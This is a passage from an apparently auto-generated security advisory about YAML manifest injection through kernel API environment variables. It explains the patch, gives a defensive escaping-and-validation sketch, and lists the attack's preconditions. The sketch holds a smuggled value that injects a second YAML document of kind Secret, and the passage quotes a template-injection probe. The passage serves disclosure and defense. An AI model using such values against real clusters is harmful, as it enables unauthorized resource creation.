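Because no template engine evaluates the input, expressions such as `{{ kernel_id.__class__ }}` are never executed; they simply fail to match and cause a `None` return.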

What the fix does

The patch introduces multiple layers of defense. Firstly, it replaces `yaml.safe_load()` with raw string usage for most environment variables, preventing YAML parsing of untrusted input. Secondly, a `yaml_safe` Jinja2 filter is added to properly escape YAML scalars. Finally, post-render validation checks ensure that the rendered manifests only contain expected resource kinds and do not exceed the allowed document count [patch_id=4715605].
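
As a rough illustration of two of these layers, the sketch below pairs scalar escaping with a post-render check. It is not the project's implementation: `yaml_safe` here only borrows the filter's name and uses `json.dumps`, relying on YAML 1.2 being designed to accept JSON strings as double-quoted scalars. `validate_manifest`, `ALLOWED_KINDS`, and `MAX_DOCUMENTS` are hypothetical, and the checks scan text instead of using a YAML parser.

```python
import json
import re

ALLOWED_KINDS = {"Pod"}  # hypothetical allowlist
MAX_DOCUMENTS = 1        # hypothetical limit


def yaml_safe(value: object) -> str:
    """Quote a value as a JSON string, which YAML reads as one double-quoted scalar."""
    return json.dumps(str(value))


def validate_manifest(manifest: str) -> None:
    """Raise ValueError on extra documents or unexpected top-level kinds."""
    lines = manifest.splitlines()
    # Simplification: one document plus one per bare '---' separator line.
    documents = 1 + sum(1 for line in lines if line.rstrip() == "---")
    if documents > MAX_DOCUMENTS:
        raise ValueError(f"expected at most {MAX_DOCUMENTS} document(s), found {documents}")
    # Simplification: only unindented 'kind:' keys are inspected.
    kinds = re.findall(r"^kind:\s*(\S+)", manifest, flags=re.MULTILINE)
    unexpected = [kind for kind in kinds if kind not in ALLOWED_KINDS]
    if unexpected:
        raise ValueError(f"unexpected resource kinds: {unexpected}")


PREFIX = "apiVersion: v1\nkind: Pod\nspec:\n  containers:\n  - name: kernel\n    workingDir: "
payload = "/tmp\n---\napiVersion: v1\nkind: Secret\n"

escaped = PREFIX + yaml_safe(payload) + "\n"
validate_manifest(escaped)  # passes: the payload stays inside one quoted scalar

unescaped = PREFIX + payload
try:
    validate_manifest(unescaped)
except ValueError as err:
    print(f"rejected: {err}")
```

The two layers are complementary in this sketch: escaping keeps the value on a single line inside quotes, and validation still rejects the manifest if an unescaped value slips through.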

Preconditions

  • network: The attacker must be able to send requests to the `/api/kernels` endpoint.
  • input: The attacker must be able to control the content of environment variables passed in the API request.

Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2
